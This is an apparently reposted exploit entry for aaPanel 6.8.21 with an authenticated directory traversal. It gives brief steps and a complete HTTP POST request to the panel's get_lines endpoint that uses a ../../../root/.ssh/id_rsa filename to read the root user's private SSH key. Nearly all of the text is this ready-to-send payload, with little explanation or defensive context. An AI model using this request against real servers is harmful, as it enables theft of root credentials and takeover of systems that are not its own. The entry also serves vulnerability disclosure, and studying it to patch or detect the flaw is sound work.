[webapps] aaPanel 6.8.21 - Directory Traversal (Authenticated)

2 years ago 139
BOOK THIS SPACE FOR AD
ARTICLE AD
# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated) # Date: 22.02.2022 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.aapanel.com/ # Software Link: https://www.aapanel.com # Version: 6.8.21 # Tested on: Ubuntu Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa) #Go to App Store #Click to "install" in any free plugin. #Change installation script to ../../../root/.ssh/id_rsa POST /ajax?action=get_lines HTTP/1.1 Host: IP:7800 Content-Length: 41 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://IP:7800 Referer: http://IP:7800/soft Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0; request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd; serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13; page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot; distribution=ubuntu; serial_no=; pro_end=-1; load_page=null; load_type=null; load_search=undefined; force=0; rank=list; Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/; path_dir_change=/www/wwwroot/ Connection: close num=10&filename=../../../root/.ssh/id_rsa
Read Entire Article